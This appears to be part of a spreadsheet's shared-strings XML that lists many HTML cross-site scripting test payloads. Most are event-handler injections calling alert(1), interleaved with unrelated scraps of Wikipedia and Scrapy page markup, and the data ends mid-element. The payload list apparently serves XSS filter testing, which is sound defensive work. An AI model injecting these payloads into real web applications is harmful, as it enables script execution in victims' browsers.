  <si>
    <t>&lt;cite draggable="true" ondrag="alert(1)"&gt;test&lt;/cite&gt;</t>
  </si>
  <si>
    <t>&lt;big draggable="true" ondragstart="alert(1)"&gt;test&lt;/big&gt;</t>
  </si>
  <si>
    <t>&lt;element onbeforecut="alert(1)" contenteditable&gt;test&lt;/element&gt;</t>
  </si>
  <si>
    <t>&lt;output onpointerenter=alert(1)&gt;XSS&lt;/output&gt;</t>
  </si>
  <si>
    <t>&lt;svg id=x onfocus=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;li onmouseover="alert(1)"&gt;test&lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFDreyfusDreyfus1986"&gt;Dreyfus &amp;amp; Dreyfus 1986 &lt;/a&gt;. </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;menu ondragover=alert(1) contenteditable&gt;drop here&lt;/menu&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Applications_of_artificial_intelligence" title="Applications of artificial intelligence"&gt;Applications &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;listing oncut="alert(1)" contenteditable&gt;test&lt;/listing&gt;</t>
  </si>
  <si>
    <t>&lt;option onpointerup=alert(1)&gt;XSS&lt;/option&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Dartmouth_Workshop" class="mw-redirect" title="Dartmouth Workshop"&gt;Dartmouth conference &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;kbd draggable="true" ondragenter="alert(1)"&gt;test&lt;/kbd&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/John_Stuart_Mill" title="John Stuart Mill"&gt;John Stuart Mill &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;nav onbeforepaste="alert(1)" contenteditable&gt;test&lt;/nav&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTEOudeyer2010-171"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTEOudeyer2010_171-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;meta id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/meta&gt;</t>
  </si>
  <si>
    <t>&lt;dd oncontextmenu="alert(1)"&gt;test&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;article draggable="true" ondragleave="alert(1)"&gt;test&lt;/article&gt;</t>
  </si>
  <si>
    <t>&lt;i onpointerleave=alert(1)&gt;XSS&lt;/i&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-3 tocsection-18"&gt;&lt;a href="#Logic-based"&gt;&lt;span class="tocnumber"&gt;5.2.2 </t>
  </si>
  <si>
    <t xml:space="preserve">        &lt;div class="wy-side-nav-search" &gt;</t>
  </si>
  <si>
    <t>&lt;th id=x tabindex=1 onfocus=alert(1)&gt;&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;details draggable="true" ondrag="alert(1)"&gt;test&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFLugerStubblefield2004"&gt;Luger &amp;amp; Stubblefield 2004 &lt;/a&gt;, pp.&amp;#160;235–240 &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;Frangoul, Anmar (14 June 2019). &lt;a rel="nofollow" class="external text" href="https://www.cnbc.com/2019/06/14/the-business-using-ai-to-change-how-we-think-about-energy-storage.html"&gt;"A Californian business is using A.I. to change the way we think about energy storage" &lt;/a&gt;. &lt;i&gt;CNBC &lt;/i&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;5 November </t>
  </si>
  <si>
    <t>&lt;summary onmouseout="alert(1)"&gt;test&lt;/summary&gt;</t>
  </si>
  <si>
    <t>&lt;header onpointerup=alert(1)&gt;XSS&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;strong style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/strong&gt;</t>
  </si>
  <si>
    <t>&lt;command onkeyup="alert(1)" contenteditable&gt;test&lt;/command&gt;</t>
  </si>
  <si>
    <t>&lt;spacer onkeyup="alert(1)" contenteditable&gt;test&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;kbd onbeforepaste="alert(1)" contenteditable&gt;test&lt;/kbd&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;See also: &lt;a href="/wiki/Lethal_autonomous_weapon" title="Lethal autonomous weapon"&gt;Lethal autonomous weapon &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;McCauley, Lee (2007). "AI armageddon and the three laws of robotics". &lt;i&gt;Ethics and Information Technology &lt;/i&gt;. &lt;b&gt;9 &lt;/b&gt; (2): 153–164. &lt;a href="/wiki/CiteSeerX" title="CiteSeerX"&gt;CiteSeerX &lt;/a&gt;&amp;#160;&lt;span class="cs1-lock-free" title="Freely accessible"&gt;&lt;a rel="nofollow" class="external text" href="//citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.85.8904"&gt;10.1.1.85.8904 &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Pseudoscience" title="Pseudoscience"&gt;Pseudoscience &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Artificial_intelligence_arms_race" title="Artificial intelligence arms race"&gt;Artificial intelligence arms race &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;link rel="alternate" type="application/x-wiki" title="Edit this page" href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit"/&gt;</t>
  </si>
  <si>
    <t>&lt;tbody onmouseleave="alert(1)"&gt;test&lt;/tbody&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Technological_singularity" title="Technological singularity"&gt;Technological singularity &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-301"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-301"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-AI_in_myth-26"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-AI_in_myth_26-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-AI_in_myth_26-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;label onkeydown="alert(1)" contenteditable&gt;test&lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;small onpaste="alert(1)" contenteditable&gt;test&lt;/small&gt;</t>
  </si>
  <si>
    <t>&lt;data oncut="alert(1)" contenteditable&gt;test&lt;/data&gt;</t>
  </si>
  <si>
    <t>&lt;audio onkeydown="alert(1)" contenteditable&gt;test&lt;/audio&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;Brynjolfsson, Erik; Mitchell, Tom (22 December 2017). &lt;a rel="nofollow" class="external text" href="http://science.sciencemag.org/content/358/6370/1530"&gt;"What can machine learning do? Workforce implications" &lt;/a&gt;. &lt;i&gt;Science &lt;/i&gt;. pp.&amp;#160;1530–1534. &lt;a href="/wiki/Bibcode" title="Bibcode"&gt;Bibcode &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://ui.adsabs.harvard.edu/abs/2017Sci...358.1530B"&gt;2017Sci...358.1530B &lt;/a&gt;. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1126%2Fscience.aap8062"&gt;10.1126/science.aap8062 &lt;/a&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;7 May </t>
  </si>
  <si>
    <t>&lt;div role="navigation" class="navbox" aria-labelledby="Robotics" style="padding:3px"&gt;&lt;table class="nowraplinks hlist mw-collapsible autocollapse navbox-inner" style="border-spacing:0;background:transparent;color:inherit"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;th scope="col" class="navbox-title" colspan="3"&gt;</t>
  </si>
  <si>
    <t>&lt;i draggable="true" ondragend="alert(1)"&gt;test&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;rt onpointerdown=alert(1)&gt;XSS&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound draggable="true" ondrag="alert(1)"&gt;test&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Case-based_reasoning" title="Case-based reasoning"&gt;Case-based reasoning &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">      &lt;div class="wy-nav-content"&gt;</t>
  </si>
  <si>
    <t>&lt;fieldset id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/fieldset&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Bill_Joy" title="Bill Joy"&gt;Bill Joy &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;tbody ondrop=alert(1) contenteditable&gt;drop here&lt;/tbody&gt;</t>
  </si>
  <si>
    <t>&lt;summary id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/summary&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Neural_networks-219"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-Neural_networks_219-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-Neural_networks_219-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;applet onmouseout="alert(1)"&gt;test&lt;/applet&gt;</t>
  </si>
  <si>
    <t>&lt;acronym onkeydown="alert(1)" contenteditable&gt;test&lt;/acronym&gt;</t>
  </si>
  <si>
    <t>&lt;colgroup onkeypress="alert(1)" contenteditable&gt;test&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;rtc onclick="alert(1)"&gt;test&lt;/rtc&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;&lt;a href="/wiki/Computer_graphics" title="Computer graphics"&gt;Graphics &lt;/a&gt; &lt;/th&gt;&lt;td class="navbox-list navbox-even" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-261"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-261"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Quickly export your scraped items to a file (XML, CSV, etc).&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFCrevier1993"&gt;Crevier 1993 &lt;/a&gt;, pp.&amp;#160;193–196 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;537–581, 863–898 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;header id=x tabindex=1 onactivate=alert(1)&gt;&lt;/header&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;a  title="Visit the main page" class="mw-wiki-logo" href="/wiki/Main_Page"&gt; &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;h1 style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/h1&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFMinsky2006" class="citation book"&gt;&lt;a href="/wiki/Marvin_Minsky" title="Marvin Minsky"&gt;Minsky, Marvin &lt;/a&gt; (2006). &lt;a href="/wiki/The_Emotion_Machine" title="The Emotion Machine"&gt;&lt;i&gt;The Emotion Machine &lt;/i&gt; &lt;/a&gt;. New York, NY: Simon &amp;amp; Schusterl. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-7432-7663-4" title="Special:BookSources/978-0-7432-7663-4"&gt;&lt;bdi&gt;978-0-7432-7663-4 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=The+Emotion+Machine&amp;amp;rft.place=New+York%2C+NY&amp;amp;rft.pub=Simon+%26+Schusterl&amp;amp;rft.date=2006&amp;amp;rft.isbn=978-0-7432-7663-4&amp;amp;rft.aulast=Minsky&amp;amp;rft.aufirst=Marvin&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;small ondrop=alert(1) contenteditable&gt;drop here&lt;/small&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/A_priori_and_a_posteriori" title="A priori and a posteriori"&gt;&lt;i&gt;A priori &lt;/i&gt; and &lt;i&gt;a posteriori &lt;/i&gt; &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;noembed id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/noembed&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;var onmouseout="alert(1)"&gt;test&lt;/var&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;spacer style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;menu ondrop=alert(1) contenteditable&gt;drop here&lt;/menu&gt;</t>
  </si>
  <si>
    <t>&lt;button oncopy="alert(1)" contenteditable&gt;test&lt;/button&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=53" title="Edit section: Social justice"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;div onmousemove="alert(1)"&gt;test&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;nav onpointermove=alert(1)&gt;XSS&lt;/nav&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=icas.com&amp;amp;rft.atitle=Accounting%2C+automation+and+AI&amp;amp;rft.date=2016-07-31&amp;amp;rft.aulast=O%27Neill&amp;amp;rft.aufirst=Eleanor&amp;amp;rft_id=https%3A%2F%2Fwww.icas.com%2Fca-today-news%2Fhow-accountancy-and-finance-are-using-artificial-intelligence&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;colgroup onpointerout=alert(1)&gt;XSS&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;source onmousedown="alert(1)"&gt;test&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;template onpointermove=alert(1)&gt;XSS&lt;/template&gt;</t>
  </si>
  <si>
    <t>&lt;form onmouseleave="alert(1)"&gt;test&lt;/form&gt;</t>
  </si>
  <si>
    <t>&lt;link onfocus=alert(1) id=x tabindex=1 style=display:block&gt;</t>
  </si>
  <si>
    <t>&lt;li oncut="alert(1)" contenteditable&gt;test&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;track id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;applet style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/applet&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. New York: Chelsea House. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-7910-0464-7" title="Special:BookSources/978-0-7910-0464-7"&gt;&lt;bdi&gt;978-0-7910-0464-7 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=The+Nervous+System&amp;amp;rft.place=New+York&amp;amp;rft.pub=Chelsea+House&amp;amp;rft.date=1991&amp;amp;rft.isbn=978-0-7910-0464-7&amp;amp;rft.aulast=Edelson&amp;amp;rft.aufirst=Edward&amp;amp;rft_id=https%3A%2F%2Farchive.org%2Fdetails%2Fnervoussystem0000edel&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;meta onpointermove=alert(1)&gt;XSS&lt;/meta&gt;</t>
  </si>
  <si>
    <t>&lt;SCRIPT ="&gt;" SRC="httx://.rocks/.js"&gt;&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="Potential_harm"&gt;Potential harm&lt;span id="Potential_risks_and_moral_reasoning"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFHaugeland1985" class="citation book"&gt;&lt;a href="/wiki/John_Haugeland" title="John Haugeland"&gt;Haugeland, John &lt;/a&gt; (1985). &lt;i&gt;Artificial Intelligence: The Very Idea &lt;/i&gt;. Cambridge, Mass.: MIT Press. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-262-08153-5" title="Special:BookSources/978-0-262-08153-5"&gt;&lt;bdi&gt;978-0-262-08153-5 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Artificial+Intelligence%3A+The+Very+Idea&amp;amp;rft.place=Cambridge%2C+Mass.&amp;amp;rft.pub=MIT+Press&amp;amp;rft.date=1985&amp;amp;rft.isbn=978-0-262-08153-5&amp;amp;rft.aulast=Haugeland&amp;amp;rft.aufirst=John&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;dt id=x tabindex=1 onactivate=alert(1)&gt;&lt;/dt&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation arxiv"&gt;Goodfellow, Ian J.; Shlens, Jonathon; Szegedy, Christian (2014). "Explaining and Harnessing Adversarial Examples". &lt;a href="/wiki/ArXiv" title="ArXiv"&gt;arXiv &lt;/a&gt;:&lt;span class="cs1-lock-free" title="Freely accessible"&gt;&lt;a rel="nofollow" class="external text" href="//arxiv.org/abs/1412.6572"&gt;1412.6572 &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Gordon_Pask" title="Gordon Pask"&gt;Gordon Pask &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;meta id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/meta&gt;</t>
  </si>
  <si>
    <t>&lt;audio id=x tabindex=1 onactivate=alert(1)&gt;&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;body onwheel=alert(1)&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Genetic_programming-191"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Genetic_programming_191-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;datalist id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/datalist&gt;</t>
  </si>
  <si>
    <t>&lt;link rel="stylesheet" href="/w/load.php?lang=en&amp;amp;modules=ext.cite.styles%7Cext.flaggedRevs.basic%2Cicons%7Cext.uls.interlanguage%7Cext.visualEditor.desktopArticleTarget.noscript%7Cext.wikimediaBadges%7Cjquery.makeCollapsible.styles%7Cmediawiki.legacy.commonPrint%2Cshared%7Cmediawiki.toc.styles%7Cmediawiki.widgets.styles%7Coojs-ui-core.icons%2Cstyles%7Coojs-ui.styles.indicators%7Cskins.vector.styles%7Cwikibase.client.init&amp;amp;only=styles&amp;amp;skin=vector"/&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Applications_of_natural_language_processing-122"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Applications_of_natural_language_processing_122-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;li id="footer-places-mobileview"&gt;&lt;a href="//en.m.wikipedia.org/w/index.php?title=Artificial_intelligence&amp;amp;mobileaction=toggle_view_mobile" class="noprint stopMobileRedirectToggle"&gt;Mobile view &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;marquee id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Stephen_Hawking" title="Stephen Hawking"&gt;Stephen Hawking &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div</t>
  </si>
  <si>
    <t>&lt;frame id=x tabindex=1 onactivate=alert(1)&gt;&lt;/frame&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="toctext"&gt;Video games </t>
  </si>
  <si>
    <t>&lt;strong draggable="true" ondrag="alert(1)"&gt;test&lt;/strong&gt;</t>
  </si>
  <si>
    <t>&lt;input onmouseenter="alert(1)"&gt;test&lt;/input&gt;</t>
  </si>
  <si>
    <t>&lt;del onkeydown="alert(1)" contenteditable&gt;test&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;u id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;li onpointerleave=alert(1)&gt;XSS&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;pre id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;Cellan-Jones, Rory (2 December 2014). &lt;a rel="nofollow" class="external text" href="https://www.bbc.com/news/technology-30290540"&gt;"Stephen Hawking warns artificial intelligence could end mankind" &lt;/a&gt;. &lt;i&gt;&lt;a href="/wiki/BBC_News" title="BBC News"&gt;BBC News &lt;/a&gt; &lt;/i&gt;. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20151030054329/http://www.bbc.com/news/technology-30290540"&gt;Archived &lt;/a&gt; from the original on 30 October 2015&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;30 October </t>
  </si>
  <si>
    <t>&lt;xmp onmousemove="alert(1)"&gt;test&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;header onmousedown="alert(1)"&gt;test&lt;/header&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFDomingos2015"&gt;Domingos 2015 &lt;/a&gt;, Chapter 5. </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=71" title="Edit section: Explanatory notes"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;big onpointerover=alert(1)&gt;XSS&lt;/big&gt;</t>
  </si>
  <si>
    <t>&lt;noframes onbeforecopy="alert(1)" contenteditable&gt;test&lt;/noframes&gt;</t>
  </si>
  <si>
    <t>&lt;input2 onpointerdown=alert(1)&gt;XSS&lt;/input2&gt;</t>
  </si>
  <si>
    <t>&lt;rt onkeyup="alert(1)" contenteditable&gt;test&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;li class="toctree-l1"&gt;&lt;a class="reference internal" href="topics/request-response.html"&gt;Requests and Responses&lt;/a&gt;&lt;/li&gt;</t>
  </si>
  <si>
    <t>Problem solving, puzzle solving, game playing and deduction:</t>
  </si>
  <si>
    <t>&lt;section onpointerup=alert(1)&gt;XSS&lt;/section&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;Ronald, E. M. A.  and Sipper, M.  &lt;a rel="nofollow" class="external text" href="https://drive.google.com/file/d/0B6G3tbmMcpR4TFdHSXNFWUtlNWc/view?usp=sharing"&gt;Intelligence is not enough: On the socialization of talking machines, Minds and Machines &lt;/a&gt;, vol. 11, no. 4, pp.&amp;#160;567–576, November 2001. &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;hgroup oncut="alert(1)" contenteditable&gt;test&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Artificial_life" title="Artificial life"&gt;Artificial life &lt;/a&gt; and society based learning:</t>
  </si>
  <si>
    <t>&lt;iframe onfocusout=alert(1) id=x&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style onmousedown="alert(1)"&gt;test&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;tfoot onpointerdown=alert(1)&gt;XSS&lt;/tfoot&gt;</t>
  </si>
  <si>
    <t>&lt;noframes onmousemove="alert(1)"&gt;test&lt;/noframes&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFMinsky1967" class="citation book"&gt;&lt;a href="/wiki/Marvin_Minsky" title="Marvin Minsky"&gt;Minsky, Marvin &lt;/a&gt; (1967). &lt;span class="cs1-lock-registration" title="Free registration required"&gt;&lt;a rel="nofollow" class="external text" href="https://archive.org/details/computationfinit0000mins"&gt;&lt;i&gt;Computation: Finite and Infinite Machines &lt;/i&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;nobr onmouseover="alert(1)"&gt;test&lt;/nobr&gt;</t>
  </si>
  <si>
    <t>&lt;frame onmouseleave="alert(1)"&gt;test&lt;/frame&gt;</t>
  </si>
  <si>
    <t>&lt;script onpointermove=alert(1)&gt;XSS&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;header onpaste="alert(1)" contenteditable&gt;test&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;ruby id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/ruby&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;script onbeforecut="alert(1)" contenteditable&gt;test&lt;/script&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">    ga('linker:autoLink', ['scrapinghub.com', 'crawlera.com']);</t>
  </si>
  <si>
